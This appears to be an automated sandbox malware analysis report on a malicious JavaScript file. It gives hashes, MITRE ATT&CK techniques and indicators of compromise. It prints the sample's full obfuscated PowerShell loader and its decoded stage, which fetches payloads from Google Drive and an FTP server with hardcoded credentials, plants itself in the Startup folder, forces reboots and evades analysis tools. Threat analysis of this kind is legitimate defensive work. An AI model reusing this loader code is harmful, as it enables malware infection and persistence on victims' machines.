2ec477f607bff57fab8762f99c4c316d467d384d3a6d3ec12286e330b1a49696

General

Target

$RDOOKRE.js
Size

199KB
MD5

0dc3ee0972ecfb9e62b68dccc42a73bf
SHA1

7f882e78a7909c006b34e4a8fd916bf8ef839a64
SHA256

4e0681a5ca00bde3ae2ab6d71b6f9d22aa579274768ae594848e7a6aa279fce6
SHA512

dcaf3a3ab69c4c8e9d39e65b514e4cc70a289af94c21a3e673f5a68ca6e3559218ca91f528f3023a2c243b3093d6f504e741b0c4ac72c99fbed4bc0c844e8831
SSDEEP

3072:AW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+YWXt+NWXt+NWXt+NWXt+NWXt+NWXC:p

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	536	powershell.exe
7	536	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$RDOOKRE.js	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$RDOOKRE.js	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
536	powershell.exe
2268	powershell.exe
3024	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2268	powershell.exe
536	powershell.exe
1736	powershell.exe
3024	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2824 wrote to memory of 2268	2824	wscript.exe	30
PID 2824 wrote to memory of 2268	2824	wscript.exe	30
PID 2824 wrote to memory of 2268	2824	wscript.exe	30
PID 2268 wrote to memory of 536	2268	powershell.exe	32
PID 2268 wrote to memory of 536	2268	powershell.exe	32
PID 2268 wrote to memory of 536	2268	powershell.exe	32
PID 536 wrote to memory of 1736	536	powershell.exe	34
PID 536 wrote to memory of 1736	536	powershell.exe	34
PID 536 wrote to memory of 1736	536	powershell.exe	34
PID 1736 wrote to memory of 3020	1736	powershell.exe	35
PID 1736 wrote to memory of 3020	1736	powershell.exe	35
PID 1736 wrote to memory of 3020	1736	powershell.exe	35
PID 536 wrote to memory of 3024	536	powershell.exe	36
PID 536 wrote to memory of 3024	536	powershell.exe	36
PID 536 wrote to memory of 3024	536	powershell.exe	36

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\$RDOOKRE.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AGgAbQ' + [char]66 + 'DAG0AIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + 'oAG0AQw' + [char]66 + 'tACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + '5AHcAZg' + [char]66 + 'qAHMAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAdg' + [char]66 + 'KAEEAdg' + [char]66 + 'UACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + 'KAEEAdg' + [char]66 + 'UACAAKQAgAHsAJA' + [char]66 + '5AHcAZg' + [char]66 + 'qAHMAIAA9ACAAKAAkAHkAdw' + [char]66 + 'mAGoAcwAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAHkAdw' + [char]66 + 'mAGoAcwAgAD0AIAAoACQAeQ' + [char]66 + '3AGYAag' + [char]66 + 'zACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'tAG0Abg' + [char]66 + '5AGoAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'tAG0Abg' + [char]66 + '5AGoALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'tAG0Abg' + [char]66 + '5AGoALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAeQ' + [char]66 + '3AGYAag' + [char]66 + 'zACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAFgASg' + [char]66 + 'rAFkAdwAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAWA' + [char]66 + 'KAGsAWQ' + [char]66 + '3ACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAeA' + [char]66 + '2AGcAYg' + [char]66 + '4ACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'vAG8ARA' + [char]66 + 'TAEkAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAEwAUQ' + [char]66 + 'RAEEAQgAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAEwAUQ' + [char]66 + 'RAEEAQgAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + '4AHYAZw' + [char]66 + 'iAHgAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAbw' + [char]66 + 'vAEQAUw' + [char]66 + 'JACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'vAG8ARA' + [char]66 + 'TAEkAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgAnACAAKwAgACcAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'GAHkAZg' + [char]66 + 'kAHoAIAApAC4AJwAgADsAJA' + [char]66 + 'NAE8ARA' + [char]66 + 'SAGcAIAArAD0AIAAnAEcAZQ' + [char]66 + '0AFQAeQ' + [char]66 + 'wAGUAKAAgACcAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAnACAAKQAuAEcAZQ' + [char]66 + '0AE0AJwAgADsAJA' + [char]66 + 'NAE8ARA' + [char]66 + 'SAGcAIAArAD0AIAAnAGUAdA' + [char]66 + 'oAG8AZAAoACAAJwAnAHAAcg' + [char]66 + 'GAFYASQAnACcAIAApAC4ASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUAKAAgACQAbg' + [char]66 + '1AGwAbAAgACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAJw' + [char]66 + 'IAHAAdQA0ADcAUwAxAHIALw' + [char]66 + '3AGEAcgAvAG0Abw' + [char]66 + 'jAC4Abg' + [char]66 + 'pAGIAZQ' + [char]66 + '0AHMAYQ' + [char]66 + 'wAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACcAIAAsACAAJwAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAnACAALAAgACAAJwAnAEQAIA' + [char]66 + 'EAEQAUg' + [char]66 + 'lAGcAQQ' + [char]66 + 'zAG0AJwAnACAAIAApACAAKQA7ACcAOwAkAFYAQg' + [char]66 + 'XAFcAegAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMwAuAHAAcwAxACcAKQAgADsAJA' + [char]66 + 'NAE8ARA' + [char]66 + 'SAGcAIA' + [char]66 + '8ACAATw' + [char]66 + '1AHQALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAALQ' + [char]66 + 'GAGkAbA' + [char]66 + 'lAFAAYQ' + [char]66 + '0AGgAIAAkAFYAQg' + [char]66 + 'XAFcAegAgACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwAIAAtAEUAeA' + [char]66 + 'lAGMAdQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAFAAbw' + [char]66 + 'sAGkAYw' + [char]66 + '5ACAAQg' + [char]66 + '5AHAAYQ' + [char]66 + 'zAHMAIAAtAEYAaQ' + [char]66 + 'sAGUAIAAkAFYAQg' + [char]66 + 'XAFcAegAgADsAfQA7AA==';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\$RDOOKRE.js') ;powershell $jPhaA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vhmCm = $host.Version.Major.Equals(2);If ( $vhmCm ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$ywfjs = 'https://drive.google.com/uc?export=download&id=';$vJAvT = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $vJAvT ) {$ywfjs = ($ywfjs + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$ywfjs = ($ywfjs + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$mmnyj = ( New-Object Net.WebClient ) ;$mmnyj.Encoding = [System.Text.Encoding]::UTF8 ;$mmnyj.DownloadFile($ywfjs, ($HzOMj + '\Upwin.msu') ) ;$XJkYw = ( 'C:\Users\' + [Environment]::UserName );JCCGX = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\$RDOOKRE.js' -Destination ( $XJkYw + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$xvgbx = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt' );$ooDSI = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $xvgbx ) ;$RVUXv | Out-File -FilePath $ooDSI -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $ooDSI ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' 